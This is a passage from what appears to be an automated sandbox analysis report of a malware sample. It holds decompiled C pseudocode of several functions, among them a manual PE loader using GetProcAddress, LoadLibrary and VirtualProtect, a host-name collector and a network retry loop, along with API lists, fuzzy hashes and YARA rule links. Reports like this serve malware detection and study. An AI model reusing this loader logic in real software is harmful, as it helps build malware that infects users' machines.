						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E022BA6BC(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x022b76ed
0x022b76f0
0x022b7700
0x022b7709
0x022b770d
0x022b77db
0x022b77e1
0x022b77e1
0x022b7727
0x022b772c
0x022b7730
0x022b7736
0x022b773b
0x022b7742
0x022b7751
0x022b7751
0x022b7755
0x022b7757
0x022b7763
0x022b776e
0x022b7779
0x022b777d
0x022b7787
0x022b778b
0x022b778d
0x022b7792
0x022b7799
0x022b77a9
0x022b77a9
0x022b7792
0x022b778b
0x022b77ab
0x022b77b0
0x022b77b5
0x022b77b5
0x022b77b8
0x022b77c1
0x022b77c6
0x022b77c6
0x022b77cb
0x022b77d0
0x022b77d0
0x022b77cb
0x022b7755
0x022b77d2
0x022b77d8
0x00000000

APIs

Part of subcall function 022B8A19: SysAllocString.OLEAUT32(80000002), ref: 022B8A76
Part of subcall function 022B8A19: SysFreeString.OLEAUT32(00000000), ref: 022B8ADC

SysFreeString.OLEAUT32(?), ref: 022B77C6
SysFreeString.OLEAUT32(022B4BD8), ref: 022B77D0

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 9ec03a6abca7d476e5ef07b105b5fda2f9ec0ee5d9e622b1ac387284422d90a0
Instruction ID: 0ec6c56ca85baefff9207b45ff410708b769ffc4a8ed5c98a8605ce7d6333b59
Opcode Fuzzy Hash: 9ec03a6abca7d476e5ef07b105b5fda2f9ec0ee5d9e622b1ac387284422d90a0
Instruction Fuzzy Hash: 94314876910219AFCB12DFA4C888CDBBB7AFFC97847144658F8159B224E331DD51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004013C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013C4() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403104;
				if( *0x4030ec > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E0040136F(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401862( &_v32,  &_v16,  *0x403100 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x4030f8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401E22(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x4030f8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401EF4(_t44, _t32 + 4);
						}
					}
					_t25 = E00401D7E(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004013ca
0x004013db
0x004013e5
0x004013dd
0x004013dd
0x004013dd
0x004013ec
0x004013f5
0x004013fa
0x00401418
0x00401474
0x0040141a
0x00401420
0x00401426
0x00401434
0x00401438
0x0040143f
0x00401448
0x0040144c
0x00401452
0x00401463
0x00401454
0x0040145a
0x0040145a
0x00401452
0x0040146b
0x0040146b
0x00401476

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00401420
ExitThread.KERNEL32 ref: 00401476

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction ID: 81bba9c2c985b02d9343bb148b21bee0e14b39adfd693302f6ca951fdd028e92
Opcode Fuzzy Hash: 92b9446ae56c0096a6d51e073f835bbe8f5f7c68a162cf9a1ffdb1302b28142d
Instruction Fuzzy Hash: 4811AC72104201AAE711DB65CD49E9B77ECAB44308F00883AB505F71F0EB34EA058B5A

Uniqueness

Uniqueness Score: -1.00%

Function 022B5D79, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B5D79(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E022B7DDD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x22bd238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E022B1037(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x022b5d79
0x022b5d81
0x022b5d98
0x022b5db3
0x022b5db7
0x022b5dbc
0x022b5dbe
0x022b5dd0
0x022b5ddc
0x022b5dc0
0x022b5dc0
0x022b5dc5
0x022b5dca
0x022b5dca
0x022b5dbe
0x022b5de2
0x022b5de6
0x022b5de6
0x022b5d8d
0x022b5d92
0x022b5d96
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 022B1037: SysFreeString.OLEAUT32(00000000), ref: 022B109A

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,022B5356,?,004F0053,04779368,00000000,?), ref: 022B5DDC

Strings

Ut, xrefs: 022B5DDC

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID: Ut
API String ID: 3806048269-8415677
Opcode ID: 28368f2e8179b465c35f4ea717253dfe9dbe7ac7ea250b415d397a2fc5d8fecd
Instruction ID: 7ced5a389540832ae92d9dbb290ebb633b529adb894d5abc9e9fb3a62342d7cf
Opcode Fuzzy Hash: 28368f2e8179b465c35f4ea717253dfe9dbe7ac7ea250b415d397a2fc5d8fecd
Instruction Fuzzy Hash: 8E01283251061ABBCF239E94DC08FEA7B65EF08790F448529FE099E124D731C970DB90

Uniqueness

Uniqueness Score: -1.00%

Function 022B831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E022B831C(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E022B1525(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E022B8B22(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x022b8321
0x022b832c
0x022b832e
0x022b8334
0x022b8336
0x022b833b
0x022b8344
0x022b8348
0x022b8351
0x022b8355
0x022b8364
0x022b8357
0x022b8358
0x022b835d
0x022b835d
0x022b8355
0x022b8348
0x022b836d

APIs

GetComputerNameExA.KERNEL32(00000003,00000000,022B9C7E,74E5F710,00000000,?,?,022B9C7E), ref: 022B8334

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

GetComputerNameExA.KERNEL32(00000003,00000000,022B9C7E,022B9C7F,?,?,022B9C7E), ref: 022B8351

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 577a568ac3d33652f4377d3d5eddd80acccd331f21986d2152615192a53e57d0
Instruction ID: 2622c5fe59eb1a3028f830e756ba79c584e0ffd382476c38d77dc87e44d74dac
Opcode Fuzzy Hash: 577a568ac3d33652f4377d3d5eddd80acccd331f21986d2152615192a53e57d0
Instruction Fuzzy Hash: 82F05466624206BEEB12DAEE9C00EEF76FDEFC5790F110055A508D7144EA70DA01C771

Uniqueness

Uniqueness Score: -1.00%

Function 022B7EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x22bd23c) == 0) {
						E022B4DB1();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x22bd23c) == 1) {
						_t10 = E022B2789(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x022b7f04
0x022b7f05
0x022b7f08
0x022b7f3a
0x022b7f3c
0x022b7f3c
0x022b7f0a
0x022b7f0b
0x022b7f20
0x022b7f27
0x022b7f29
0x022b7f29
0x022b7f27
0x022b7f0b
0x022b7f44

APIs

InterlockedIncrement.KERNEL32(022BD23C), ref: 022B7F12

Part of subcall function 022B2789: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B279C

InterlockedDecrement.KERNEL32(022BD23C), ref: 022B7F32

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 71a798615b83606c26025c7b2a5fb03b5f42502dbd8798022a8e268c445d4845
Instruction ID: 478887065f025ab78f9f9faf542aa5b634b08ac605cd9ab5cce29dc5b6d442ad
Opcode Fuzzy Hash: 71a798615b83606c26025c7b2a5fb03b5f42502dbd8798022a8e268c445d4845
Instruction Fuzzy Hash: BEE04F226782239B9A2366F4984EBEAE680BF807D4F099965F882D111CDB50C450D6D5

Uniqueness

Uniqueness Score: -1.00%

Function 022B933A, Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B933A(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x22bd2c8; // 0x4779618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E022B8C01( &_v68) == 0) {
						goto L16;
					}
					_t30 = E022B97F7(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E022B5988(_t31, _t28); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E022BD000 = E022BD000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E022B58DB( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x22bd26c, 0) == 0x102);
				return _t30;
			}

0x022b933a
0x022b9340
0x022b9347
0x022b934f
0x022b9355
0x022b9358
0x022b935a
0x022b935a
0x022b9362
0x022b9362
0x022b936c
0x00000000
0x00000000
0x022b937b
0x022b937f
0x022b9383
0x022b9388
0x022b938c
0x022b93c8
0x022b93ca
0x022b93ca
0x022b938e
0x022b9395
0x022b93bf
0x022b9397
0x022b9397
0x022b939c
0x022b93b8
0x022b939e
0x022b939e
0x022b93a3
0x022b93a8
0x022b93ab
0x022b93ad
0x022b93b2
0x022b93b4
0x022b93b4
0x022b93b2
0x022b93a3
0x022b939c
0x022b9395
0x022b938c
0x022b93d7
0x022b93dc
0x022b93dc
0x022b9400

APIs

WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 022B93EC

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: ebc5395f6dc91951e6c9730e00ca805f85ae37f30f518be4ad7895af15365dbe
Instruction ID: f2216e318a2b1145c452cd2614c7e2eb06f2772a7d3b3372744aaa7b8f25a07f
Opcode Fuzzy Hash: ebc5395f6dc91951e6c9730e00ca805f85ae37f30f518be4ad7895af15365dbe
Instruction Fuzzy Hash: 0D216D31B2024A9BDF13DAD9D894BEE77A6AF803D4F154429E601AF2D8D7B0D891CF50

Uniqueness

Uniqueness Score: -1.00%

Function 022B1037, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E022B1037(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x22bd2a8; // 0x24ba5a8
				_t4 = _t15 + 0x22be39c; // 0x4778944
				_t20 = _t4;
				_t6 = _t15 + 0x22be124; // 0x650047
				_t17 = E022B76E7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E022B7EA4(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x022b1041
0x022b1048
0x022b1049
0x022b104a
0x022b104b
0x022b1051
0x022b1056
0x022b1056
0x022b1060
0x022b1072
0x022b1079
0x022b10a7
0x022b107b
0x022b107d
0x022b1082
0x022b10a4
0x022b1084
0x022b1087
0x022b108e
0x022b1093
0x022b1095
0x022b1095
0x022b109a
0x022b109a
0x022b1082
0x022b10ae

APIs

Part of subcall function 022B76E7: SysFreeString.OLEAUT32(?), ref: 022B77C6

Part of subcall function 022B7EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,022B51D4,004F0053,00000000,?), ref: 022B7EAD
Part of subcall function 022B7EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,022B51D4,004F0053,00000000,?), ref: 022B7ED7
Part of subcall function 022B7EA4: memset.NTDLL ref: 022B7EEB

SysFreeString.OLEAUT32(00000000), ref: 022B109A

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 2ba86bf286c087930807e4094593de5521809164be78cb9d34b0e783b9cbb15e
Instruction ID: 65cd3aa1a6a1f070ef346da0c190892a0c15dd006ef3a072656c5c48647be7bb
Opcode Fuzzy Hash: 2ba86bf286c087930807e4094593de5521809164be78cb9d34b0e783b9cbb15e
Instruction Fuzzy Hash: E2015A32920159BFDB139BE9DC04DEABBB9EF44390F414825EE15A6064E7719921CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0235CA19, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 0235CA61

Memory Dump Source

Source File: 00000000.00000002.559143030.0000000002359000.00000040.00000001.sdmp, Offset: 02359000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: bf10d1e3067a98add651d0d927ec71963355b9009eff148d15e2080a8a5345d7
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 2AF0F6315003206BD7207BF49C8CF6E7AECAF48628F14292AFA4A910C0CB70E8458AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041999C, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004199FA

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction ID: ed52568bc59515ee859463f4e18c9ef311edcb66e0091e068fec364a2c5981ef
Opcode Fuzzy Hash: 141070658d78ade838dcfdee5f25a4b0fae43cdc9ca8b4750ae202ba536ad394
Instruction Fuzzy Hash: 050128B5600108FBCB04DFA9D995E9E73B5AF88350F14C549F9198B280D738EE50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042E430, Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(01FB4154,01FB4264,00000040,?,?,0042F5E3), ref: 0042E4D1

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b75599429c841d951495a9b5ef61d44d11d171bbdf7ddafb936f8452b594c68f
Instruction ID: 7254842ad740c22b289b27de2db53db516d3118084c442a71ade2219d008d17e
Opcode Fuzzy Hash: b75599429c841d951495a9b5ef61d44d11d171bbdf7ddafb936f8452b594c68f
Instruction Fuzzy Hash: 620116B1208284EED301CF64BE86B523BA4AF95707F20712DE0465B2B5DB756604DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040136F(void* __eax, intOrPtr _a4) {

				 *0x403110 =  *0x403110 & 0x00000000;
				_push(0);
				_push(0x40310c);
				_push(1);
				_push(_a4);
				 *0x403108 = 0xc; // executed
				L00401746(); // executed
				return __eax;
			}

0x0040136f
0x00401376
0x00401378
0x0040137d
0x0040137f
0x00401383
0x0040138d
0x00401392

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013F1,00000001,0040310C,00000000), ref: 0040138D

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction ID: 17493d3f587428f8fefc298e6e1fa5166c11f7a8d69dd9124bb4eb41bc27f639
Opcode Fuzzy Hash: 1a6a7a0cbcb211806d4e421c93ccdd2d337a60f7500ba4ce8895fb39eafca520
Instruction Fuzzy Hash: 53C04C74144310A7E6109F009D46F457E557759706F204529B1103D1E183F95254895D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7D0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,?,0041861B,?,?,0041B940), ref: 0041B7D7

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 48f32bdd431aa7b82a37eddd464709490d3fdfde6bb30ac7076121da41895a52
Instruction ID: 248be66754e1a3ed536d27b3ac3727851aa8c7f713864bd334da7b17a2ec1c9f
Opcode Fuzzy Hash: 48f32bdd431aa7b82a37eddd464709490d3fdfde6bb30ac7076121da41895a52
Instruction Fuzzy Hash: A9A0243104430C73D30013C37C0DF113F0CD3C0771F040010F50C01C500D7154104055

Uniqueness

Uniqueness Score: -1.00%

Function 00401D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401D7E(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403100;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45);
				_t18 = E00401000( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403100 - 0x69b24f45 &  !( *0x403100 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E004010E4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401264(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401BAE(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E004017CB(_t42);
					L8:
					return _t29;
				}
			}

0x00401d86
0x00401d88
0x00401da4
0x00401db5
0x00401dbc
0x00401e1a
0x00000000
0x00401dbe
0x00401dbe
0x00401dc8
0x00401dcc
0x00401dd1
0x00401dd4
0x00401dd9
0x00401ddd
0x00401de2
0x00401de7
0x00401deb
0x00401df0
0x00401df1
0x00401df5
0x00401dfa
0x00401e02
0x00401e02
0x00401dfa
0x00401deb
0x00401ddd
0x00401e04
0x00401e0d
0x00401e11
0x00401e1b
0x00401e21
0x00401e21

APIs

Part of subcall function 00401000: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401046
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401072
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 00401088
Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,00401DC8,?,?,?,?,?,00401DC8,?,?,?,?,?,?,?), ref: 0040111B
Part of subcall function 004010E4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401150

Part of subcall function 00401264: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 0040129C

Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401BE7
Part of subcall function 00401BAE: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 00401C5C
Part of subcall function 00401BAE: GetLastError.KERNEL32 ref: 00401C62

GetLastError.KERNEL32(?,?), ref: 00401DFC

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction ID: e7e1ad0c5ae7c8012b4b43df85cfbbfbb8c05be311c934117461263c8cc71cd7
Opcode Fuzzy Hash: 8731538ceb2d12050e79bcb7b22b00ca6da66f24cf0d43321f952fe27491e5f4
Instruction Fuzzy Hash: E811E936600301ABD721AA95CD80DEF77BCAF88318700017EFB01B7691EAB4ED0587D4

Uniqueness

Uniqueness Score: -1.00%

Function 0235C6D8, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0235C729

Memory Dump Source

Source File: 00000000.00000002.559143030.0000000002359000.00000040.00000001.sdmp, Offset: 02359000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3238be562b0a840527b94654aebfe27baabe7a29b99442e49b9d705d877f2f77
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: AC113C79A00208EFDB01DF98CA85E98BFF5AF08750F058095F9489B362D771EA90DF84

Uniqueness

Uniqueness Score: -1.00%

Function 0042E410, Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000000,01FB4264,0042F52D), ref: 0042E418

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
Instruction ID: 02ff169c2bcaba9242ef57989b002877965e4d2950505e3d7326f7fc0d8de085
Opcode Fuzzy Hash: c866dd67d46a662cb26efd7e2e2d1f1bf081687ca6cd9af6b3686c8412a9d681
